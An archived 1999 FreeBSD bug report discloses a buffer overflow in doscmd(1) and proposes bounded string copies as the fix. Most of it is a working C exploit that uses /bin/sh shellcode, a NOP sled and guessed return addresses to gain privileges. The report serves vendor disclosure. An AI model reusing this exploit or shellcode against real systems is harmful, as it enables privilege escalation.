Date: 20 Dec 1999 18:54:51 -0000 From: venglin@lagoon.FreeBSD.lublin.pl To: FreeBSD-gnats-submit@freebsd.org Subject: bin/15593: [SECURITY] ustrcpy() buffer overflow in doscmd(1) Message-ID: <19991220185451.99398.qmail@lagoon.FreeBSD.lublin.pl>
next in thread | raw e-mail | index | archive | help
>Number: 15593 >Category: bin >Synopsis: [SECURITY] ustrcpy() buffer overflow in doscmd(1) >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 11:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Przemyslaw Frasunek >Release: FreeBSD 3.4-STABLE i386 >Organization: Lublin BSD Users Group >Environment: FreeBSD lagoon.FreeBSD.lublin.pl 3.4-STABLE FreeBSD 3.4-STABLE #0: Sat Dec 18 17:37:37 CET 1999 root@:/usr/sys/compile/LAGOON i386 >Description: It is possible to gain extra privileges by overflowing buffer in dos_makepath(). doscmd(1) is NOT suid/sgid by default. >How-To-Repeat: /* * * (c) 1999 babcia padlina ltd. <babunia@FreeBSD.lublin.pl> * FreeBSD /usr/bin/doscmd exploit. * */ #include <stdio.h> #include <sys/param.h> #include <sys/stat.h> #include <string.h> #define NOP 0x90 #define BUFSIZE 1000 #define ADDRS 1200 long getesp(void) { __asm__("movl %esp, %eax\n"); } int main(argc, argv) int argc; char **argv; { char *execshell = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; char *buf, *p; int noplen, i, ofs, align; long ret, *ap; if(!(buf = (char *)malloc(BUFSIZE+1))) { perror("malloc()"); return -1; } if (argc < 3) { fprintf(stderr, "usage: %s ofs align\n", argv[0]); exit(0); } ofs = atoi(argv[1]); align = atoi(argv[2]); noplen = BUFSIZE - strlen(execshell); ret = getesp() + ofs; memset(buf, NOP, noplen); buf[noplen+1] = '\0'; strcat(buf, execshell); setenv("EGG", buf, 1); free(buf); if(!(buf = (char *)malloc(ADDRS+align+1))) { perror("malloc()"); return -1; } memset(buf, 'a', align); p = &buf[align]; ap = (unsigned long *)p; for(i = 0; i < ADDRS / 4; i++) *ap++ = ret; p = (char *)ap; *p = '\0'; fprintf(stderr, "ret: 0x%x\n", ret); execl("/usr/bin/doscmd", "doscmd", buf, 0); return 0; } >Fix: Replace ustrcpy() and ustrcat() with strncpy() and strncat() in cwd.c:232. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?19991220185451.99398.qmail>